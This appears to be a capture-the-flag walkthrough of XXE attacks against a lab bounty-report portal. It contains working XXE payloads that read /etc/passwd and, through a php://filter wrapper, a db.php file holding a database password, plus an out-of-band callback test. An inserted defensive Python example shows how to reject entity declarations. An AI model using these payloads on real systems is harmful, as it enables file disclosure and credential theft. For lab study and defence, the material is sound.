2: port 80 (XXE)
$ gobuster dir -u 10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
/assets (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/resources (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/portal.php (Status: 200) [Size: 125]
/css (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/index.php (Status: 200) [Size: 25169]
/db.php (Status: 200) [Size: 0]
/js (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]
http://10.10.11.100/resources/README.txt
Tasks:
[ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
[X] Write tracker submit script
[ ] Connect tracker submit script to the database
[X] Fix developer group permissions
http://10.10.11.100/portal.php
Portal under development. Go <a href="log_submit.php">here</a> to test the bounty tracker.
http://10.10.11.100/log_submit.php
Bounty Report System - Beta
# contains a form for submitting bug reports
# understanding how the data is sent: Burp shows the form data leaving the browser encoded
data entered on form > base64 > url_encode > sent.
With CyberChef the recipe is confirmed (base64, then URL-encode); using Burp we can rewrite the decoded XML and try XXE attacks
https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
# adding this to our sent data
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://10.10.16.161"> %xxe; ]>
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.100 - - [01/Aug/2021 22:11:38] "GET / HTTP/1.0" 200 -
# the callback request arrives, so external entities are resolved: time to XXE
# Using https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<bugreport>
<title>k</title>
<cwe>k</cwe>
<cvss></cvss>
<reward>&xxe;</reward>
</bugreport>
# /etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
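As an added, defender-side example (not part of these notes and not the portal's own code, written in Python rather than the portal's PHP): the server-side reversal of the form's base64 > url_encode pipeline, followed by a parse that refuses any DOCTYPE or ENTITY declaration before the parser can resolve an external entity such as the `SYSTEM "/etc/passwd"` one above. The function names and the two sample reports are constructed for this example.

```python
import base64
import urllib.parse
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """Submission declares a DTD or an entity; a bug report never needs either."""


def encode_submission(xml_text: str) -> str:
    """Mirror of the form's pipeline (XML > base64 > URL-encode), used to build input."""
    b64 = base64.b64encode(xml_text.encode("utf-8")).decode("ascii")
    return urllib.parse.quote(b64, safe="")


def decode_submission(encoded: str) -> str:
    """Reverse the pipeline on the server side before any XML parsing happens."""
    return base64.b64decode(urllib.parse.unquote(encoded)).decode("utf-8")


def parse_report(xml_text: str) -> dict:
    """Parse a <bugreport> into {leaf element: text}, refusing any DTD or entity.

    Expat fires StartDoctypeDeclHandler at '<!DOCTYPE' and EntityDeclHandler at each
    '<!ENTITY' before any external resource is touched, so raising from those
    handlers stops the parse before an external entity could be resolved.
    """
    fields = {}
    buf = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE '{name}' is not allowed in a bug report")

    def entity_decl(*args):
        raise UnsafeXmlError("entity declarations are not allowed in a bug report")

    def start_element(name, attrs):
        buf.clear()  # start collecting text for this element

    def character_data(data):
        buf.append(data)

    def end_element(name):
        if name != "bugreport":  # the root element carries no text of its own
            fields[name] = "".join(buf).strip()

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = character_data
    parser.Parse(xml_text, True)
    return fields


def triage_submission(encoded: str) -> tuple:
    """Decode one submitted report; return ('accepted', fields) or ('rejected', reason)."""
    try:
        return ("accepted", parse_report(decode_submission(encoded)))
    except UnsafeXmlError as exc:
        return ("rejected", str(exc))
    except (expat.ExpatError, ValueError) as exc:  # bad base64/UTF-8 or malformed XML
        return ("rejected", f"malformed submission: {exc}")


# Constructed samples (not captured traffic): a normal report and one carrying the
# same DTD shape as the file-read payload in the notes above.
BENIGN_XML = """<?xml version="1.0"?>
<bugreport>
  <title>Stored XSS in profile page</title>
  <cwe>CWE-79</cwe>
  <cvss>6.1</cvss>
  <reward>500</reward>
</bugreport>"""

XXE_XML = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<bugreport><title>k</title><cwe>k</cwe><cvss></cvss><reward>&xxe;</reward></bugreport>"""


if __name__ == "__main__":
    print(triage_submission(encode_submission(BENIGN_XML)))
    print(triage_submission(encode_submission(XXE_XML)))
```

Rejecting at the DOCTYPE declaration is the right layer: a text search for `<!ENTITY` on the raw bytes can be fooled by encoding tricks, whereas the parser's own declaration callbacks fire on whatever it is actually about to process. In the portal's PHP the equivalent is to parse without `LIBXML_NOENT` (the flag that turns on entity substitution) and, on PHP 7, call `libxml_disable_entity_loader(true)`.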
# tried RCE through the expect:// wrapper (expect://id)
# did NOT work despite many attempts (the wrapper is evidently not available)
# moving back to reading files: try db.php next
# reading it directly returns nothing
# PHP source substituted into the XML is not returned as text, so it has to come back in an encoded form
Using the second technique from https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file (php://filter base64 wrapper):
# <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
# <data>&example;</data>
# payload sent
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
<bugreport>
<title>k</title>
<cwe>k</cwe>
<cvss></cvss>
<reward>&xxe;</reward>
</bugreport>
# the payload after base64 + URL-encoding, as the form sends it
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgIDx0aXRsZT5rPC90aXRsZT4KICAgPGN3ZT5rPC9jd2U%2BCiAgIDxjdnNzPjwvY3Zzcz4KICAgPHJld2FyZD4meHhlOzwvcmV3YXJkPgo8L2J1Z3JlcG9ydD4%3D
# sent via Burp; the response renders the reward field:
Title: k
CWE: k
Score:
Reward: PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=
# reward field base64-decoded: the contents of db.php
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>